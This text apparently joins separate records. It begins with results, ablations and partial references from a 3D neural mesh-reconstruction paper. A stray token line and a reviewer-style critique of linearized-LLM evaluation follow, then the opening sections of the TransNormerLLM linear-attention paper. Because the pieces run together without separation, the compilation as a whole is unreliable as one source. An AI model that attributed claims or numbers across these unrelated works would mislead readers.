In Table 1, we show a quantitative comparison on novel view synthesis between our method and other neural rendering and differentiable rasterization methods. We perform the experiments on the widely-used NeRF-Synthetic dataset (Mildenhall et al., 2021). We observe that even though NeuS and TensoRF achieve very high quality using their original volume rendering, when directly transferred to mesh rendering without any fine-tuning—shown as NeuS (DT) and TensoRF (DT) in the table—they have sharp performance drops. Specifically, we essentially extract meshes from their density or SDF fields and then use them for surface rendering. This involves fetching color information from their appearance networks using surface points. nvdiffrec can generate watertight and manifold meshes, but its rendering quality has a large gap with other neural rendering methods. In contrast, our models (both high-quality and fast) achieve high quality in both mesh reconstruction and rendering. It is worth noting that our method attains the highest rendering quality compared to all other surface rendering techniques, surpassing even those that generate non-manifold meshes.

| Method | Geometry | Mesh | Watertight | Manifold | PSNR↑ | SSIM↑ | LPIPS↓ |
|-----------------|----------|------|------------|----------|-------|-------|--------|
| NeRF | Volume | X | - | - | 31.00 | 0.947 | 0.081 |
| TensoRF | Volume | X | - | - | 33.20 | 0.963 | 0.050 |
| NeuS* | Volume | X | - | - | 30.74 | 0.951 | 0.064 |
| MobileNeRF | Mesh | ✓ | X | X | 30.90 | 0.947 | 0.062 |
| nvdiffrec | Mesh | ✓ | ✓ | X | 28.90 | 0.938 | 0.073 |
| nerf2mesh | Mesh | ✓ | ✓ | X | 29.76 | 0.940 | 0.072 |
| TensoRF (DT) | Mesh | ✓ | ✓ | ✓ | 25.28 | 0.886 | 0.115 |
| NeuS* (DT) | Mesh | ✓ | ✓ | ✓ | 27.85 | 0.935 | 0.074 |
| nvdiffrec (m) | Mesh | ✓ | ✓ | ✓ | 27.65 | 0.933 | 0.084 |
| Ours (F) | Mesh | ✓ | ✓ | X | 30.94 | 0.952 | 0.061 |
| Ours (HQ) | Mesh | ✓ | ✓ | X | **31.65** | **0.956** | **0.056** |
| Ours (F-m) | Mesh | ✓ | ✓ | ✓ | 30.47 | 0.949 | 0.065 |
| Ours (HQ-m) | Mesh | ✓ | ✓ | ✓ | 31.19 | 0.954 | 0.059 |

Table 1. Average results on the NeRF-Synthetic dataset. The results of NeRF, MobileNeRF, and nerf2mesh are taken from their papers, and the other results for mesh rendering are tested on our machine using the PyTorch implementation. (DT: direct transfer) * instant-nsr-pl (Guo, 2022) implementation. The geometry property is grouped by color.

Fig. 5. Visual comparison of mesh quality of different methods. MobileNeRF generates a triangle soup that can only preserve the rough shape. nvdiffrec gives a coarse mesh and fails in some regions. TensoRF is over-detailed and NeuS is over-smoothed. Our method combines the merits of these methods and is comparable to, and even better than, the non-manifold meshes of nerf2mesh. (Non-manifold methods are denoted by *)
In addition, when the manifold property is not required, our visual fidelity can be further boosted with the third-stage fine-tuning, leading to an average PSNR 0.65 dB higher than vanilla NeRF.

We also show visual comparisons on mesh-based rendering in Fig. 4. We can clearly see that mesh rendering with meshes directly extracted from NeuS and TensoRF fails to recover the high-frequency details and thin structures in the scene. Moreover, since they apply volume rendering and integrate the colors of multiple points along the ray to match the training images during optimization, simply extracting the color of a single point at the isosurface cannot faithfully recover the appearance of the scene. nvdiffrec directly applies mesh rendering during training, but the recovered meshes can miss complex structures, thus resulting in a degradation in visual quality. In contrast, our method benefits from the initialization from neural volume rendering and can better recover the fine-grained details of the scene.

We also verify the effectiveness of our method on two real datasets, the MipNeRF-360 dataset (Barron et al., 2022) and the LLFF dataset (Mildenhall et al., 2019). The quantitative results on MipNeRF-360 are shown in Table 2, where our method significantly outperforms other mesh-based methods on indoor scenes. More results are in the Appendix.

| Method | Geo. | Outdoor | Indoor |
|-----------------|------|---------|--------|
| NeRF | Vol | 21.46 | 26.84 |
| NeRF++ | Vol | 22.76 | 28.05 |
| mip-NeRF | Vol | 24.47 | 31.72 |
| Mobile-NeRF | Mesh | 21.95 | - |
| BakedSDF | Mesh | **22.47** | **27.06** |
| Ours (HQ-m) | Mesh | 21.07 | 25.80 |
| Ours (HQ) | Mesh | 22.05 | **27.63** |

Table 2. PSNR on unbounded scenes. More metrics are in the Appendix.

Fig. 6. Average VSA-tolerance plot for test views from four NeRF-Synthetic scenes. The depth map of the mesh produced by Ours (HQ-m) achieves high matching scores consistently for different tolerance values. (Non-manifold methods are denoted by dotted lines.)

| G. Init | A. Init | PSNR↑ | SSIM↑ | LPIPS↓ |
|---------|---------|-------|-------|--------|
| ✗ | ✗ | 20.56 | 0.826 | 0.204 |
| ✗ | ✓ | 24.43 | 0.882 | 0.149 |
| ✓ | ✗ | 29.74 | 0.945 | 0.067 |
| ✓ | ✓ | **31.19** | **0.954** | **0.059** |

Table 3. Ablation study for Stage 1. Using initializations from volume rendering enables more accurate mesh reconstruction and rendering, leading to more accurate novel view synthesis.

| Geo. + App. | PSNR↑ | SSIM↑ | LPIPS↓ |
|-------------|-------|-------|--------|
| GT + TF | 31.78 | 0.958 | 0.053 |
| TFmesh + MLP | 26.28 | 0.915 | 0.203 |
| TFmesh + Hash | 26.62 | 0.921 | 0.090 |
| TFmesh + SH | 26.48 | 0.909 | 0.103 |
| TFmesh + TF | 27.00 | 0.929 | 0.081 |
| TFmesh (opt) + TF | **29.74** | **0.945** | **0.067** |

Table 4. Ablation study for Stage 2. Our full method (last row) jointly optimizes geometry and appearance and achieves the best performance. (TF: TensoRF)

### 4.3 Comparison on Mesh Reconstruction

We observe that traditional mesh-distance metrics such as Chamfer distance are not suitable for mesh quality comparison, as they are often dominated by the performance of regions unseen during training. To this end, we propose to use the visible surface agreement (VSA) metric, modified from the visible surface discrepancy proposed by Hodaň et al. (2020):
$$e_{VSA} = \underset{p \in V \cup \hat{V}}{\text{avg}} \begin{cases} 1 & \text{if } p \in V \cap \hat{V} \land |D(p) - \hat{D}(p)| < \tau \\ 0 & \text{otherwise} \end{cases}$$
where, given a view, $D$ and $\hat{D}$ denote the depth maps of the ground-truth and reconstructed meshes, $V$ and $\hat{V}$ denote the corresponding pixel visibility masks, and $\tau$ is the misalignment tolerance. Higher VSA indicates a better match between depth maps.
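The per-view metric is straightforward to compute from a pair of depth maps. The sketch below assumes background pixels are marked with `inf` (or NaN) in the depth maps, which is our own convention, not one stated in the paper.

```python
import numpy as np

def visible_surface_agreement(depth_gt, depth_rec, tau):
    """VSA for one view, per the definition above (higher is better)."""
    vis_gt = np.isfinite(depth_gt)    # V:     pixels where the GT mesh is visible
    vis_rec = np.isfinite(depth_rec)  # V-hat: pixels where the reconstruction is
    both = vis_gt & vis_rec
    match = np.zeros(depth_gt.shape, dtype=bool)
    match[both] = np.abs(depth_gt[both] - depth_rec[both]) < tau
    return match[vis_gt | vis_rec].mean()  # average over the visibility union
```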
We compare the average VSA metric over 200 testing views of the NeRF-Synthetic dataset with different misalignment tolerances in Fig. 6 (others in Appendix Fig. 18). We additionally provide a visual comparison of the reconstructed meshes in Fig. 5. From the comparisons, we can clearly see that our method achieves consistently better VSA performance than the manifold mesh baseline methods. Our generated meshes better capture the detailed structures of the scene, such as the lego wheels, even better than nerf2mesh (Tang et al., 2022), which generates non-manifold ones.

### 4.4 Ablation for Stage 1 & 2

To show the importance and effectiveness of using initialization from volume rendering, we design an ablation study using different initialization methods for Stage 1. As we can see from Table 3, directly optimizing the mesh without initialization from volume rendering leads to the worst novel view synthesis performance. Both geometry initialization and appearance initialization boost accuracy, with geometry initialization playing the more critical role in the performance improvement. Additional visual results in Appendix Fig. 17 highlight that when high-resolution grids are employed without appropriate geometry initialization, the mesh optimization process can easily become trapped in a local minimum.

We validate the necessity of optimizing the meshes in Table 4. To achieve this, we compare against baselines that keep the meshes from Stage 1 fixed and only optimize the appearance. We also provide the results using the GT mesh in combination with the TensoRF appearance network as a reference, representing the upper limit of texture optimization methods. As we can see from the results, using the meshes without further optimization achieves much lower accuracy than our full method, which demonstrates the necessity of jointly optimizing the geometry and appearance in Stage 2. All appearance networks were trained from scratch for a fair comparison.

4.5 SPEED AND QUALITY TRADE-OFF

We show the model performance and speed after deployment into GLSL in Table 5, illustrating the trade-off between model capacity and inference speed. FPS is computed with the average time to render the first frame in the test set of the NeRF-Synthetic dataset on an NVIDIA RTX 4090.

5 APPLICATIONS

With a manifold mesh-based geometry representation, NeuManifold can be easily plugged into a wide variety of 3D content creation tools. This is a significant advantage over previous neural reconstruction methods, and we demonstrate three such applications below.

Fig. 7. Applications of NeuManifold. (a) Geometry editing with Laplacian surface editing. (b) Appearance editing with vertex painting. (c) Collision shape for cloth simulation. (d) Collision-aware convex decomposition.
Geometry editing. Geometry editing algorithms often rely on good input mesh connectivity. In Fig. 7a, we demonstrate Laplacian surface editing (Sorkine et al., 2004) for non-rigid deformation of the reconstructed microphone.

Appearance editing. Our meshes integrate directly into modeling software and can be edited by artists. In Fig. 7b, we load the generated mesh into Blender and paint its vertices. The painted color is multiplied with the original color in the GLSL shader.

Physical Simulation. Our reconstructed meshes can be used as static collision meshes for soft-body simulation (e.g., cloth simulation, as shown in Fig. 7c), similar to previous works. Moreover, the watertight and manifold properties enable a wider range of applications. For example, they can be used as direct input to the collision-aware convex decomposition algorithm (Wei et al., 2022) for rigid-body collision shape generation (Fig. 7d). They can be directly converted to finite-element meshes by Delaunay tetrahedralization (Hang, 2015) and used in a finite-element simulation with incremental potential contact (IPC) (Li et al., 2020) (Fig. 1 and Appendix Fig. 12).

6 CONCLUSION

We have introduced a novel method for reconstructing high-quality, watertight manifold meshes with accurate rendering support from multi-view images. However, our method currently faces limitations when dealing with specular areas, like the “materials” scene in NeRF-Synthetic and the “room” scene in the LLFF dataset. In these cases, the reconstructed meshes may exhibit discontinuities to capture the effect of different colors for the same point seen from different views. We believe that addressing this issue will require the incorporation of inverse rendering techniques and the inclusion of additional priors to ensure more accurate geometry.

| Params | AA | PSNR↑ | SSIM↑ | LPIPS↓ | FPS |
|--------|----|-------|-------|--------|-----|
| #feat=48, mlp=3×64 | 8× MS | 30.34 | 0.949 | 0.062 | 93 |
| #feat=48, mlp=3×64 | 16× SS | 31.16 | 0.954 | 0.057 | 26 |
| #feat=48, mlp=3×16 | 8× MS | 29.73 | 0.942 | 0.071 | 322 |
| #feat=48, mlp=3×16 | 16× SS | 30.49 | 0.947 | 0.064 | 86 |
| #feat=12, mlp=3×64 | 8× MS | 30.11 | 0.946 | 0.066 | 98 |
| #feat=12, mlp=3×64 | 16× SS | 30.90 | 0.951 | 0.060 | 27 |
| #feat=12, mlp=3×16 | 8× MS | 29.55 | 0.941 | 0.073 | 585 |
| #feat=12, mlp=3×16 | 16× SS | 30.28 | 0.946 | 0.066 | 163 |
| #feat=48, SH | 8× MS | 29.73 | 0.943 | 0.068 | 312 |
| #feat=48, SH | 16× SS | 30.44 | 0.949 | 0.063 | 82 |

Table 5. Trade-off between rendering speed and quality with different appearance network capacities. 8× MS: 8 samples per pixel MSAA; 16× SS: 16 samples per pixel SSAA.

REFERENCES

Jonathan T Barron, Ben Mildenhall, Matthew Tancik, Peter Hedman, Ricardo Martin-Brualla, and Pratul P Srinivasan. Mip-nerf: A multiscale representation for anti-aliasing neural radiance fields. In Proceedings of the IEEE/CVF International Conference on Computer Vision, pp. 5855–5864, 2021.

Jonathan T Barron, Ben Mildenhall, Dor Verbin, Pratul P Srinivasan, and Peter Hedman. Mip-nerf 360: Unbounded anti-aliased neural radiance fields. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 5470–5479, 2022.

Sai Bi, Zexiang Xu, Pratul Srinivasan, Ben Mildenhall, Kalyan Sunkavalli, Miloš Hašan, Yannick Hold-Geoffroy, David Kriegman, and Ravi Ramamoorthi. Neural reflectance fields for appearance acquisition. arXiv preprint arXiv:2008.03824, 2020a.

Sai Bi, Zexiang Xu, Kalyan Sunkavalli, Miloš Hašan, Yannick Hold-Geoffroy, David Kriegman, and Ravi Ramamoorthi. Deep reflectance volumes: Relightable reconstructions from multi-view photometric images. In European Conference on Computer Vision, pp. 294–311. Springer, 2020b.
Sai Bi, Zexiang Xu, Kalyan Sunkavalli, David Kriegman, and Ravi Ramamoorthi. Deep 3d capture: Geometry and reflectance from sparse multi-view images. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 5960–5969, 2020c.

Anpei Chen, Zexiang Xu, Andreas Geiger, Jingyi Yu, and Hao Su. TensoRF: Tensorial radiance fields. In Computer Vision–ECCV 2022: 17th European Conference, Tel Aviv, Israel, October 23–27, 2022, Proceedings, Part XXXII, pp. 333–350. Springer, 2022a.

Anpei Chen, Zexiang Xu, Xinyue Wei, Siyu Tang, Hao Su, and Andreas Geiger. Dictionary fields: Learning a neural basis decomposition. ACM Transactions on Graphics (TOG), 42(4):1–12, 2023a.

Anpei Chen, Zexiang Xu, Xinyue Wei, Siyu Tang, Hao Su, and Andreas Geiger. Factor fields: A unified framework for neural fields and beyond. arXiv preprint arXiv:2302.01226, 2023b.

Zhiqin Chen, Thomas Funkhouser, Peter Hedman, and Andrea Tagliasacchi. Mobilenerf: Exploiting the polygon rasterization pipeline for efficient neural field rendering on mobile architectures. arXiv preprint arXiv:2208.00277, 2022b.

Shuo Cheng, Zexiang Xu, Shilin Zhu, Zhuwen Li, Li Erran Li, Ravi Ramamoorthi, and Hao Su. Deep stereo using adaptive thin volume representation with uncertainty awareness. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR), pp. 2524–2534, 2020.

Chong Bao and Bangbang Yang, Zeng Junyi, Bao Hujun, Zhang Yinda, Cui Zhaopeng, and Zhang Guofeng. Neumesh: Learning disentangled neural mesh-based implicit field for geometry and texture editing. In European Conference on Computer Vision (ECCV), 2022.

Sara Fridovich-Keil, Alex Yu, Matthew Tancik, Qinhong Chen, Benjamin Recht, and Angjoo Kanazawa. Plenoxels: Radiance fields without neural networks. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 5501–5510, 2022.

Yasutaka Furukawa and Jean Ponce. Accurate, dense, and robust multiview stereopsis. IEEE Transactions on Pattern Analysis and Machine Intelligence, 32(8):1362–1376, 2010.

Dan B Goldman, Brian Curless, Aaron Hertzmann, and Steven M Seitz. Shape and spatially-varying brdfs from photometric stereo. IEEE Transactions on Pattern Analysis and Machine Intelligence, 32(6):1060–1071, 2009.

Yuanchen Guo. Instant neural surface reconstruction, 2022. https://github.com/bennyguo/instant-nsr-pl/tree/main.

Si Hang. Tetgen, a delaunay-based quality tetrahedral mesh generator. ACM Trans. Math. Softw, 41(2):11, 2015.
OROKjdAfjs
In terms of evaluation, although the abstract claims that the linearized LLM extends to 175B parameters, most experiments are conducted on 385M models. For the large parameter-size settings, the authors only report the memory and latency cost savings. The accuracy information is missing, without which it is hard to evaluate the linearized LLMs.
TransNormerLLM: A Faster and Better Large Language Model with Improved TransNormer

Anonymous authors Paper under double-blind review

Abstract

We present TransNormerLLM, the first linear attention-based Large Language Model (LLM) that outperforms conventional softmax attention-based models in terms of both accuracy and efficiency. TransNormerLLM evolves from the previous linear attention architecture TransNormer (Qin et al., 2022a) by making advanced modifications that include positional embedding, linear attention acceleration, a gating mechanism, tensor normalization, and inference acceleration and stabilization. Specifically, we use LRPE (Qin et al., 2023b) together with an exponential decay to avoid attention dilution issues while allowing the model to retain global interactions between tokens. Additionally, we propose Lightning Attention, a cutting-edge technique that makes linear attention more than twice as fast at runtime and reduces its memory usage by a remarkable factor of four. To further enhance the performance of TransNormer, we leverage a gating mechanism to smooth training and a new tensor normalization scheme to accelerate the model, resulting in an impressive speedup of over 20%. Furthermore, we develop a robust inference algorithm that ensures numerical stability and consistent inference speed regardless of the sequence length, showcasing superior efficiency during both training and inference stages. We also implement an efficient model parallel schema for TransNormerLLM, enabling seamless deployment on large-scale clusters and facilitating expansion to even more extensive models, i.e., LLMs with 175B parameters. We validate our model design through a series of ablations and train models with sizes of 385M, 1B, and 7B on our self-collected corpus. Benchmark results demonstrate that our models not only match the performance of state-of-the-art Transformer-based LLMs but are also significantly faster.

1 Introduction

The field of Natural Language Processing (NLP) has been revolutionized by the advent of large-scale language models (LLMs) (Touvron et al., 2023a; Biderman et al., 2023; Brown et al., 2020). These models have demonstrated exceptional performance across a multitude of tasks, elevating the ability to comprehend, generate, and interact with human language in computational frameworks. Previous language modeling development has predominantly centered around Transformer architectures, with seminal models such as the vanilla Transformer (Vaswani et al., 2017), the GPT series (Radford et al., 2018; 2019; Brown et al., 2020), BERT (Devlin et al., 2019), and BART (Lewis et al., 2019) standing as standard backbones in related fields. The success of Transformer architectures is premised on the softmax attention mechanism, which discerns dependencies among input tokens in a data-driven scheme and has global position awareness, offering the model an effective way to handle the long-range dynamics of natural language. Nevertheless, conventional Transformers are not without their constraints. Primarily, their quadratic time complexity with respect to the sequence length limits their scalability and hampers efficiency in terms of computational resources and time during the training and inference stages. Numerous efficient sequence modeling methods have been proposed in an attempt to reduce the quadratic time complexity to linear (Katharopoulos et al., 2020; Choromanski et al., 2021; Qin et al., 2022b; Zheng et al., 2023; 2022).
However, two issues have prevented these methods from being applied to LLMs: 1) their performance in language modeling is often unsatisfactory; 2) they do not demonstrate speed advantages in real-world scenarios.

In this paper, we introduce TransNormerLLM, the first linear attention-based LLM that surpasses conventional softmax attention in both accuracy and efficiency. The development of TransNormerLLM builds upon the foundations of the previous linear attention architecture, TransNormer (Qin et al., 2022a), while incorporating a series of advanced modifications to achieve superior performance. The key enhancements in TransNormerLLM include positional embedding, linear attention acceleration, a gating mechanism, tensor normalization, and inference acceleration. One notable improvement is the replacement of TransNormer's DiagAttention with Linear Attention to enhance global interactions. To address the dilution issue, we introduce LRPE (Qin et al., 2023b) with exponential decay (Press et al., 2022; Qin et al., 2023a; Peng et al., 2023a). We also introduce Lightning Attention, a novel technique that significantly accelerates linear attention during training, yielding a more than two-fold speedup while reducing memory usage by a factor of four through IO awareness. Furthermore, we simplify the GLU and normalization modules, with the latter leading to a 20% speedup. A robust inference algorithm ensures numerical stability and constant inference speed regardless of the sequence length, thereby enhancing the efficiency of our model during both training and inference stages.

We validate the efficacy of TransNormerLLM on our self-collected pre-training corpus, which is more than 6TB in size and contains over 2 trillion tokens. We scale the original TransNormer model from 385M to 175B parameters and benchmark models with sizes of 385M, 1B, and 7B. The benchmark results demonstrate that our models achieve performance competitive with existing state-of-the-art Transformer-based LLMs of similar sizes while also having faster inference speeds. We will open-source our pre-trained models, enabling researchers and practitioners to build upon our work and explore efficient transformer structures in LLMs.

2 RELATED WORK

2.1 TRANSFORMER-BASED LLMs

In recent years, the field of Large Language Models (LLMs) has experienced significant advancements. Adhering to the scaling laws (Kaplan et al., 2020), various LLMs with over 100 billion parameters have been introduced, such as GPT-3 (Brown et al., 2020), Gopher (Rae et al., 2022), PaLM (Chowdhery et al., 2022), and GLM (Du et al., 2022). More specialized models like Galactica (Taylor et al., 2022) have also emerged for specific domains like science. A notable development is Chinchilla (Hoffmann et al., 2022), an LLM with 70 billion parameters that redefines these scaling laws, focusing on the number of tokens rather than model weights. Furthermore, LLaMA (Touvron et al., 2023a) has also sparked interest due to its promising performance and open-source availability. The discourse around LLMs also encompasses the dynamics between open-source and closed-source models. Open-source models such as BLOOM (Workshop et al., 2023), OPT (Zhang et al., 2022), LLaMA (Touvron et al., 2023a), Pythia (Biderman et al., 2023), and Falcon (Penedo et al., 2023) are rising to compete against their closed-source counterparts, including GPT-3 (Brown et al., 2020) and Chinchilla (Hoffmann et al., 2022).
To speed up training, Sparse Attention (Child et al., 2019; Beltagy et al., 2020) was introduced, but among large models, only GPT-3 adopted it (Brown et al., 2020; Scao et al., 2022).

2.2 NON-TRANSFORMER-BASED LLM CANDIDATES

Despite the proliferation of Transformer-based large models in the research community, a portion of recent work has prioritized addressing their quadratic time complexity. This focus has led to the exploration and development of a series of model architectures that diverge from the traditional Transformer structure. Among them, four significant contenders (linear transformers, state space models, long convolutions, and linear recurrences) have shown promising results as substitutes for self-attention (SA) modules when modeling long sequences. These alternatives are favored for their superior asymptotic time complexity and competitive performance.

**Linear Transformer** Linear transformers decompose softmax attention into the inner product of hidden representations, which allows them to use the "right product trick": the product of keys and values is computed first, avoiding the quadratic $n \times n$ attention matrix. Different methods utilize various hidden representations. For example, Katharopoulos et al. (2020) use 1+elu as an activation function, Qin et al. (2022b) use the cosine function to approximate the properties of softmax, and Ke et al. approximate softmax through theoretical approaches. Although the theoretical complexity is \(O(nd^2)\), the actual computational efficiency of linear attention becomes quite low when used in causal attention due to the need for cumsum operations (Hua et al., 2022). On the other hand, most linear transformers still exhibit a certain performance gap compared to traditional Transformers (Katharopoulos et al., 2020; Liu et al., 2022).

**State Space Model** State space models are based on the state space equation for sequence modeling (Gu et al., 2022b), using special initialization (Gu et al., 2020; 2022a), diagonalization assumptions (Gupta et al., 2022), and other techniques (Dao et al., 2022b) to achieve performance comparable to Transformers. Owing to the structure of the state space equation, inference can be conducted with constant complexity (Gu et al., 2022b).

**Long Convolution** Long convolution models (Qin et al., 2023a; Fu et al., 2023) utilize a kernel size equal to the input sequence length, facilitating a wider context compared to traditional convolutions. Training these models involves the efficient \(O(n \log n)\) Fast Fourier Transform (FFT) algorithm. However, long convolutions pose certain challenges, such as the need for causal convolution inference, which necessitates caching all historical computations, similar to the key-value (KV) cache of SA. The memory requirements for handling long sequences, coupled with higher inference complexity compared to RNNs, make them less ideal for processing long sequences.

**Linear RNN** Linear RNNs (Orvieto et al., 2023; Peng et al., 2023b), in contrast, stand out as more suitable replacements for SA in long-sequence modeling. A notable example is RWKV (Peng et al., 2023b), a linear RNN-based LLM that has shown competitive performance against similarly scaled GPT models.

3 TRANSNORMERLLM

3.1 ARCHITECTURE IMPROVEMENT

In this section, we thoroughly investigate each module of the network and propose several improvements to achieve an optimal balance between efficiency and performance.
Below, we outline the key designs of each block along with the inspiration behind each change. For the detailed configurations of TransNormerLLM variants from 385M to 175B parameters, see Appendix A.

3.1.1 IMPROVEMENT 1: POSITION ENCODING

In TransNormer, DiagAttention is used at the lower layers to avoid dilution issues. However, this leads to a lack of global interaction between tokens. In TransNormerLLM, we leverage LRPE (Qin et al., 2023b) with exponential decay (Press et al., 2022; Qin et al., 2023a; Peng et al., 2023b) to address this issue, retaining full attention at the lower layers. The expression of our position encoding is as follows:

\[ a_{st} = q_s^\top k_t \lambda^{s-t} \exp(i\theta(s-t)), \] (1)

which we call LRPE-d (Linearized Relative Positional Encoding with exponential decay). Similar to the original LRPE, we set \(\theta\) to be learnable. We empirically find that rather than applying LRPE-d to every layer, applying it to the first layer and keeping the other layers with plain exponential decay speeds up training by approximately 15-20%, with only a subtle effect on performance. Note that this position encoding is fully compatible with Linear Attention, as it can be decomposed with respect to \(s\) and \(t\) separately. The value of \(\lambda\) for the \(h\)-th head in the \(l\)-th layer (assuming there are a total of \(H\) heads and \(L\) layers) is given by:

\[ \lambda = \exp\left(-\frac{8h}{H} \times \left(1 - \frac{l}{L}\right)\right). \] (2)

Here, \(\frac{8h}{H}\) corresponds to the decay rate of the \(h\)-th head, while \(\left(1 - \frac{l}{L}\right)\) corresponds to the decay rate of the \(l\)-th layer. The term \(\left(1 - \frac{l}{L}\right)\) ensures that the theoretical receptive fields (TRF) (Qin et al., 2023c) at the lower layers are smaller compared to the higher layers, which aligns with TransNormer's motivation. Note that the decay rate in the last layer is set to 1, allowing each token to attend to global information. We choose \(\lambda\) to be non-learnable since we empirically found that gradients become unstable when \(\lambda\) is learnable, leading to NaN values.

3.1.2 IMPROVEMENT 2: GATING MECHANISM

Gating can enhance the performance of the model and smooth the training process. In TransNormerLLM, we adopt the approach from Flash (Hua et al., 2022) and use the structure of Gated Linear Attention (GLA) in token mixing:

\[ \text{TokenMixer}: O = \text{Norm}(QK^\top V) \odot U, \] (3)

where

\[ Q = \phi(XW_q), \quad K = \phi(XW_k), \quad V = XW_v, \quad U = XW_u. \] (4)

We choose \(\phi\) to be the swish (Ramachandran et al., 2017) activation function, as we empirically find that it outperforms other activation functions, as shown in Table 6. To further accelerate the model, we propose Simple GLU (SGLU), which removes the activation function from the original GLU structure, as the gate itself can introduce non-linearity. Therefore, our channel mixing becomes:

\[ \text{ChannelMixer}: O = [V \odot U]W_o, \quad V = XW_v, \quad U = XW_u. \] (5)

We empirically find that not using an activation function in GLU does not lead to any performance loss, as demonstrated in Table 7.

3.1.3 IMPROVEMENT 3: TENSOR NORMALIZATION

We employ the NormAttention introduced in TransNormer (Qin et al., 2022a) as follows:

\[ O = \text{Norm}((QK^\top)V). \] (6)

This attention mechanism eliminates the softmax and scaling operations.
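To make the block designs concrete, here is a minimal PyTorch sketch of the GLA token mixer (Eqs. 3-4) and the SGLU channel mixer (Eq. 5). It is a reading aid under simplifying assumptions, not the released implementation: a single head, no causal mask, no LRPE-d, and the generic Norm instantiated as the SimpleRMSNorm variant discussed below; all class names and dimensions are illustrative.

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

class SRMSNorm(nn.Module):
    """SimpleRMSNorm: x / (||x||_2 / sqrt(d)); no learnable parameters."""
    def forward(self, x):
        d = x.shape[-1]
        return x * (d ** 0.5) / x.norm(dim=-1, keepdim=True).clamp(min=1e-8)

class GLA(nn.Module):
    """Gated Linear Attention token mixer: O = Norm(Q K^T V) * U."""
    def __init__(self, d):
        super().__init__()
        self.wq = nn.Linear(d, d, bias=False)
        self.wk = nn.Linear(d, d, bias=False)
        self.wv = nn.Linear(d, d, bias=False)
        self.wu = nn.Linear(d, d, bias=False)
        self.norm = SRMSNorm()

    def forward(self, x):                        # x: (batch, seq, d)
        q = F.silu(self.wq(x))                   # phi = swish
        k = F.silu(self.wk(x))
        v, u = self.wv(x), self.wu(x)
        scores = q @ k.transpose(-1, -2)         # left product (training form);
        return self.norm(scores @ v) * u         # a causal mask would go on `scores`

class SGLU(nn.Module):
    """Simple GLU channel mixer: O = [V * U] W_o, with no activation."""
    def __init__(self, d, hidden):
        super().__init__()
        self.wv = nn.Linear(d, hidden, bias=False)
        self.wu = nn.Linear(d, hidden, bias=False)
        self.wo = nn.Linear(hidden, d, bias=False)

    def forward(self, x):
        return self.wo(self.wv(x) * self.wu(x))
```

A full layer composes the two with pre-norm residual connections, exactly as in the pseudo-code of Section 3.1.4 below.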
Moreover, NormAttention can be transformed into linear attention through right multiplication:

\[ O = \text{Norm}(Q(K^\top V)). \] (7)

This linear form allows for recurrent prediction with a complexity of \( O(nd^2) \), making it efficient during inference. Specifically, we only update \( K^\top V \) in a recurrent manner, without computing the full attention matrix. In TransNormerLLM, we replace RMSNorm with a new, simple normalization function called SimpleRMSNorm, abbreviated as SRMSNorm:

\[ \text{SRMSNorm}(x) = \frac{x}{\|x\|_2/\sqrt{d}}. \] (8)

We empirically find that using SRMSNorm does not lead to any performance loss, as demonstrated in the ablation study in Table 8.

3.1.4 THE OVERALL STRUCTURE

The overall structure is illustrated in Figure 1. In this structure, the input \( X \) is updated through two consecutive steps: first, it undergoes Gated Linear Attention (GLA) with SimpleRMSNorm (SRMSNorm) normalization; then, it goes through the Simple Gated Linear Unit (SGLU), again with SRMSNorm normalization. This overall architecture, which follows the PreNorm approach, helps improve the model's performance. The pseudo-code of the overall process is as follows:

\[ X = X + \text{GLA}(\text{SRMSNorm}(X)), \quad X = X + \text{SGLU}(\text{SRMSNorm}(X)). \] (9)

3.2 TRAINING OPTIMIZATION

3.2.1 LIGHTNING ATTENTION

The structure of linear attention allows for efficient attention calculation with a complexity of \( O(nd^2) \) through right-multiplication. However, for causal prediction, right-multiplication is not efficient, as it necessitates a cumsum computation (Hua et al., 2022), which hinders parallel training. As a result, during training we continue to use the conventional left-multiplication version. To accelerate attention calculations, we introduce the Lightning Attention algorithm, inspired by (Dao, 2023; Dao et al., 2022a), which makes our linear attention IO-friendly. It computes the following:

$$O = (QK^\top \odot M)V.$$ (10)

Here, $M$ is the attention mask, which enables lower-triangular causal masking and positional encoding. In Lightning Attention, we split the inputs $Q$, $K$, $V$ into blocks, load them from slow HBM to fast SRAM, compute the attention output with respect to those blocks, and then accumulate the final results. The computation is accelerated by avoiding operations on slow HBM. The implementation details of Lightning Attention are shown in Appendix E: Algorithm 3 gives the forward pass and Algorithm 4 the backward pass.
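The gap between the two multiplication orders is easy to see in code: without a causal mask, matrix associativity makes them identical, while the masked case breaks this equivalence, which is exactly why training uses the masked left product that Lightning Attention tiles over. A minimal sketch (sizes are illustrative; Norm is omitted):

```python
import torch

torch.manual_seed(0)
n, d = 256, 32
q, k, v = torch.randn(3, n, d)

left = (q @ k.transpose(-1, -2)) @ v   # O(n^2 d): materializes the n x n matrix
right = q @ (k.transpose(-1, -2) @ v)  # O(n d^2): only the d x d state K^T V
print(torch.allclose(left, right, rtol=1e-3, atol=1e-3))  # True
```

Once the mask `M` is inserted into the left product, the d x d state would have to be recomputed per position (a cumsum), which is the inefficiency the blocked HBM/SRAM schedule above is designed around.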
3.2.2 MODEL PARALLELISM ON TRANSNORMERLLM

To effectively execute large-scale pre-training for TransNormerLLM, we have put effort into system optimization along several dimensions. Specifically, we employ fully sharded data parallelism (FSDP) (Zhao et al., 2023), a technique that shards all model parameters, gradients, and optimizer state tensors across the entire cluster. This strategic partition significantly reduces the memory footprint on each individual GPU, thereby enhancing memory utilization. In our pursuit of greater efficiency, we leverage activation checkpointing (Shoeybi et al., 2019), which minimizes the activations cached in memory during the forward pass; instead of being retained, they are recomputed when calculating gradients in the backward pass. This approach saves a large amount of GPU memory and thus enables larger batch sizes. Furthermore, we harness automatic mixed precision (AMP) (Micikevicius et al., 2017) to simultaneously save GPU memory and expedite computation. It is noteworthy that in our experimental setup we employ BFloat16 (Kalamkar et al., 2019) due to its observed advantage in enhancing the training stability of TransNormerLLM models.

